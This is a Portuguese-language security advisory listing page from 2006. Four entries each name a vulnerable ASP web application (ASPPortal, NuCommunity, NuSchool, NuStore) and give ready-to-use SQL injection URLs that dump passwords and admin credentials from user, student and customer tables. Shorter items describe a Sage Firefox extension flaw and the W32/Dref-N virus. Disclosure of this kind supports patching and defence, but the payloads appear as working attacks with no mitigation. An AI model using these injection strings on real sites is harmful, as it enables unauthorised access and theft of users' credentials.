|
Por Raphael Martins (Ashiyakuza)
|
|
12 de novembro de 2006 |
Nome do Script: ASPPortal
Site do script: http://www.aspportal.net
Versão Afetada: 4.0.0 e anteriores
Encontrado por ajann
Email: ajannhwt [at] hotmail.com
Exploração:
http://www.target.com/default1.asp?Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20
|
|
|
Por Raphael Martins (Ashiyakuza)
|
|
12 de novembro de 2006 |
Nome do Script: NuCommunity
Site do script: http://www.dynamicdataworx.com/Sales/NuCommunity.asp
Versão Afetada: 1.0
Encontrado por ajann
Email: ajannhwt [at] hotmail.com
Exploração:
http://target/[path]/cl_CatListing.asp?cl_cat_ID=-1%20union%20select%200,0,0,admin_user%20from%20admin+where+admin_id%20like%20
http://target/[path]/cl_CatListing.asp?cl_cat_ID=-1%20union%20select%200,0,0,admin_password%20from%20admin+where+admin_id%20like%20
|
|
|
Por Raphael Martins (Ashiyakuza)
|
|
11 de novembro de 2006 |
Nome do Script: NuSchool
Site do script: http://www.dynamicdataworx.com/Sales/NuSchool.asp
Versão Afetada: 1.0
Encontrado por ajann
Email: ajannhwt [at] hotmail.com
Exploração:
http://target/[path]/CampusNewsDetails.asp?NewsID=-1%20union%20select%2000,UserName,Password,0%20from%20students%20where%20StudentID%20like%20
|
|
|
Por Raphael Martins (Ashiyakuza)
|
|
11 de novembro de 2006 |
Nome do Script: NuStore
Site do script: http://www.dynamicdataworx.com/Sales/NuStore.asp
Versão Afetada: 1.0
Encontrado por ajann
Email: ajannhwt [at] hotmail.com
Exploração:
http://[target]/[path]/Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customers%20where%20no=0
http://[target]/[path]/Products.asp?CategoryID=-1&SubCatagoryID=-1%20union%20select%200,0,pass,0%20from%20customeremail%20where%20no=0
|
|
|
Por Raphael Martins (Ashiyakuza)
|
|
10 de novembro de 2006 |
|
David Kierznowski descobriu um vulnerabilidade na extensão Sage para Firefox, que pode ser explorado por pessoas maliciosos para conduzir ataques de inserção do certificado, rss.
A vulnerabilidade é causado devido a um erro de validação da entrada no processamento da Tag “img” nos comentários.
Solução
Não adicionar comentários para códigos desconhecidos.
|
|
|
Por Staff
|
|
09 de novembro de 2006 |
|
Um
novo vírus utiliza uma notícia falsa sobre a morte do presidente dos
Estados Unidos, George W. Bush, para convencer suas vítimas a clicar em
um programa nocivo.
A praga virtual, batizada como W32/Dref-N
também pode ser encontrada em mensagens sobre o início de uma guerra
nuclear ou mesmo o assassinato do presidente russo Vladimir Putin.
Ao
clicar no arquivo anexo (que chega como uma mensagem enviada por um
conhecido, pois o vírus se utiliza da lista de endereços da máquina
infectada), o internauta desabilita o firewall do Windows e abre o
computador para o ataque de hackers. Além disso, baixa outros arquivos
nocivos para o PC da vítima...
|
|
Leia mais...
|
|
|
|
<< Início < Anterior 1 2 3 4 5 6 7 8 9 Próximo > Fim >>
|
| Resultados 131 - 156 de 231 |
Avisos de Segurança 
